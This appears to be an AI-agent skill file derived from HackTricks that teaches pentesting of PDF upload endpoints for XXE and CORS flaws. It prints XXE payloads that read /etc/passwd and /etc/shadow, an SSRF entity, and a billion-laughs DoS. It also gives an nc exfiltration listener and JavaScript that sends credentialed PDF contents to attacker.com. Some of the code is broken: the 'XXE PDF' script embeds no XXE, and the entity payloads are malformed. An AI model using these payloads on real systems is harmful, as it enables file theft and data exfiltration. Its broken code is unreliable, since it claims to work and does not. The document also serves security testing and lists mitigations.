Hacktricks-skills pdf-upload-xxe-cors-bypass

How to test PDF upload endpoints for XXE (XML External Entity) injection and CORS bypass vulnerabilities. Use this skill whenever you're pentesting file upload functionality, especially PDF uploads, or when investigating XXE injection vectors through file parsing. Make sure to use this skill when the user mentions PDF uploads, file upload vulnerabilities, XXE injection, CORS misconfigurations, or any file parsing security testing.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass/SKILL.MD
source content

PDF Upload - XXE and CORS Bypass Testing

This skill helps you identify and exploit XXE (XML External Entity) injection vulnerabilities and CORS bypass issues in PDF upload endpoints.

Understanding the Vulnerabilities

XXE in PDF Uploads

PDF files can contain XML-based content (especially in newer PDF versions). When a server parses uploaded PDFs without proper validation, it may process embedded XML entities, leading to:

  • Local file disclosure - Reading files from the server filesystem
  • SSRF - Making requests to internal services
  • RCE - In some cases, remote code execution
  • DoS - Billion laughs attack via entity expansion

CORS Bypass in PDF Uploads

CORS (Cross-Origin Resource Sharing) misconfigurations can allow:

  • Cross-origin PDF access - Reading PDFs from other domains
  • Credential theft - Accessing authenticated PDF content
  • Data exfiltration - Extracting sensitive information from PDFs

Testing Methodology

Step 1: Identify PDF Upload Endpoints

Look for endpoints that accept PDF files:

# Find upload endpoints
grep -r "upload" /path/to/app/
grep -r "\.pdf" /path/to/app/

# Check for file upload forms
curl -I https://target.com/upload | grep -i "content-type"

Step 2: Test for XXE Injection

Create a Malicious PDF with XXE Payload

PDF files can embed XML content. Create a test PDF with embedded XXE:

# scripts/create-xxe-pdf.py
import fitz  # PyMuPDF

def create_xxe_pdf(output_path):
    doc = fitz.open()
    page = doc.new_page()
    
    # Add text content
    text = "Test PDF for XXE"
    page.insert_text((72, 72), text)
    
    # Save the PDF
    doc.save(output_path)
    doc.close()
    
    print(f"Created: {output_path}")

if __name__ == "__main__":
    create_xxe_pdf("xxe_test.pdf")

XXE Payloads to Test

Basic XXE Payload:

<!ENTITY xxe SYSTEM "file:///etc/passwd">%xxe;

File Read Payload:

<!ENTITY xxe SYSTEM "file:///etc/shadow">%xxe;

SSRF Payload:

<!ENTITY xxe SYSTEM "http://internal-service:8080/admin">%xxe;

Billion Laughs (DoS):

<!ENTITY a "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
<!ENTITY b "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
<!ENTITY c "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
<!ENTITY d "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">
<!ENTITY e "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">

Step 3: Test CORS Configuration

Check CORS Headers

# Test CORS headers on PDF endpoint
curl -I -H "Origin: https://evil.com" https://target.com/api/pdf/upload

# Check for overly permissive CORS
curl -I -H "Origin: *" https://target.com/api/pdf/upload

# Test with different origins
curl -I -H "Origin: https://attacker.com" https://target.com/api/pdf/upload

Common CORS Misconfigurations

HeaderVulnerable ValueRisk
Access-Control-Allow-Origin
*
High - allows any origin
Access-Control-Allow-Origin
Reflected originMedium - reflects attacker's origin
Access-Control-Allow-Credentials
true
with
*
Critical - allows credentials with any origin
Access-Control-Allow-Methods
*
Medium - allows all HTTP methods

Step 4: Exploitation Techniques

XXE Exploitation

  1. File Disclosure:

    # Upload malicious PDF and check response
    curl -X POST https://target.com/upload \
      -F "file=@malicious.pdf" \
      -v | grep -i "root:"  # Check for /etc/passwd content
    
  2. SSRF:

    # Monitor for internal requests
    # Check if internal services are accessible
    curl -X POST https://target.com/upload \
      -F "file=@ssrf-pdf.pdf"
    
  3. Out-of-Band Data Exfiltration:

    # Set up listener
    nc -lvnp 4444
    
    # Upload PDF with XXE pointing to your server
    curl -X POST https://target.com/upload \
      -F "file=@ooe-pdf.pdf"
    

CORS Bypass Exploitation

  1. Cross-Origin PDF Access:

    <!-- scripts/cors-test.html -->
    <script>
    fetch('https://target.com/api/pdf/protected.pdf', {
      method: 'GET',
      mode: 'cors',
      credentials: 'include'
    })
    .then(response => response.text())
    .then(data => {
      // Send to attacker server
      fetch('https://attacker.com/collect', {
        method: 'POST',
        body: data
      });
    });
    </script>
    
  2. Credential Theft:

    // If CORS allows credentials, authenticated requests work
    fetch('https://target.com/api/pdf/user-data.pdf', {
      credentials: 'include'  // Sends cookies
    });
    

Step 5: Verification and Reporting

XXE Verification Checklist

  • Server processes XML entities in PDF content
  • File read payloads return expected content
  • SSRF payloads reach internal services
  • DoS payloads cause resource exhaustion
  • Error messages reveal parsing details

CORS Verification Checklist

  • Access-Control-Allow-Origin
    is not
    *
  • Origin is not reflected in response
  • Credentials are not allowed with wildcard origin
  • Sensitive PDFs are not accessible cross-origin
  • CORS preflight requests are properly validated

Common Tools

PDF Manipulation

# Install PyMuPDF
pip install pymupdf

# Create test PDFs
python scripts/create-xxe-pdf.py

# Inspect PDF structure
pdfinfo target.pdf

CORS Testing

# Use curl for manual testing
curl -I -H "Origin: https://evil.com" https://target.com/api/pdf

# Use browser DevTools
# Check Network tab for CORS headers

Automated Scanning

# Check for XXE in file upload
nuclei -u https://target.com/upload -t xxe.yaml

# Check CORS configuration
nuclei -u https://target.com/api/pdf -t cors.yaml

Mitigation Recommendations

For XXE

  1. Disable XML entity processing in PDF parsers
  2. Validate file content - ensure uploaded files are actually PDFs
  3. Use allowlists for permitted file types
  4. Sanitize input before processing
  5. Run parsers in sandboxed environments

For CORS

  1. Set specific origins instead of
    *
  2. Don't reflect origin in response headers
  3. Disable credentials when using wildcard origin
  4. Validate preflight requests
  5. Use SameSite cookies for additional protection

References

Example Workflow

# 1. Create test PDF with XXE payload
python scripts/create-xxe-pdf.py

# 2. Upload and test for XXE
curl -X POST https://target.com/upload \
  -F "file=@xxe_test.pdf" \
  -v

# 3. Check CORS headers
curl -I -H "Origin: https://evil.com" \
  https://target.com/api/pdf/upload

# 4. Analyze response for vulnerabilities
# 5. Document findings and recommend fixes

Important Notes

  • Always get authorization before testing file upload vulnerabilities
  • Test in isolated environments to avoid impacting production
  • Document all findings with evidence and reproduction steps
  • Follow responsible disclosure when reporting vulnerabilities
  • Consider business impact when prioritizing remediation